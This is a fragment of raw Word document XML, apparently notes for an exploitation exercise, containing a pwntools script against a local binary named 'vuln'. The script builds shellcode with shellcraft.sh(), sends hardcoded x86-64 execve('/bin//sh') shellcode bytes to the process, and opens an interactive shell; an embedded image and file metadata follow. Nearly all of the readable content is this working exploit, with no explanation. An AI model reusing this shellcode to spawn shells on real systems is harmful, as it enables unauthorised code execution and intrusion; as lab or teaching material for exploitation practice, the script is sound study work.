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F76F" w14:textId="77777777" w:rsidR="00CE3192" w:rsidRPr="00CE3192" w:rsidRDefault="00CE3192" w:rsidP="00CE3192">
      <w:r w:rsidRPr="00CE3192">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE3192">
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE3192">
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD748D9" w14:textId="77777777" w:rsidR="00CE3192" w:rsidRPr="00CE3192" w:rsidRDefault="00CE3192" w:rsidP="00CE3192">
      <w:r w:rsidRPr="00CE3192">
        <w:t>context(arch='amd64')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51127968" w14:textId="77777777" w:rsidR="00CE3192" w:rsidRPr="00CE3192" w:rsidRDefault="00CE3192" w:rsidP="00CE3192">
      <w:r w:rsidRPr="00CE3192">
        <w:t xml:space="preserve">p = process('vuln') </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC87D0C" w14:textId="77777777" w:rsidR="00CE3192" w:rsidRPr="00CE3192" w:rsidRDefault="00CE3192" w:rsidP="00CE3192">
      <w:r w:rsidRPr="00CE3192">
        <w:t xml:space="preserve">shellcode = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE3192">
        <w:t>asm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE3192">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CE3192">
        <w:t>shellcraft.sh(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CE3192">
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42720F46" w14:textId="77777777" w:rsidR="00CE3192" w:rsidRPr="00CE3192" w:rsidRDefault="00CE3192" w:rsidP="00CE3192">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CE3192">
        <w:t>p.sendline</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CE3192">
        <w:t>(b"\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC0C912" w14:textId="77777777" w:rsidR="00CE3192" w:rsidRPr="00CE3192" w:rsidRDefault="00CE3192" w:rsidP="00CE3192">
      <w:r w:rsidRPr="00CE3192">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEE8CCE" w14:textId="77777777" w:rsidR="00CE3192" w:rsidRPr="00CE3192" w:rsidRDefault="00CE3192" w:rsidP="00CE3192">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CE3192">
        <w:t>p.interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CE3192">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9CAFCD" w14:textId="77777777" w:rsidR="00CE3192" w:rsidRPr="00CE3192" w:rsidRDefault="00CE3192" w:rsidP="00CE3192"/>
    <w:p w14:paraId="620196AA" w14:textId="77777777" w:rsidR="000C412A" w:rsidRDefault="000C412A"/>
    <w:p w14:paraId="18E37254" w14:textId="1E731643" w:rsidR="00CE3192" w:rsidRDefault="00C14C69">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C14C69">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4029C448" wp14:editId="181DD9EC">
            <wp:extent cx="5274310" cy="1465580"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="902623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3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A5"/>
    <w:rsid w:val="000C412A"/>
    <w:rsid w:val="00280F85"/>
    <w:rsid w:val="003B3AAB"/>
    <w:rsid w:val="005D4495"/>
    <w:rsid w:val="008A5C04"/>
    <w:rsid w:val="008A6BB9"/>
    <w:rsid w:val="00C14C69"/>
    <w:rsid w:val="00CA1913"/>
    <w:rsid w:val="00CE3192"/>
    <w:rsid w:val="00EA6E7E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0FCF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FD7D1A58-770B-431D-A53C-9043D435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5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5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5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5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5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5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5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5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5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5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5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35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5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5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5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5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5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5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5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5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5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5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5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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-23T03:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-23T03:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>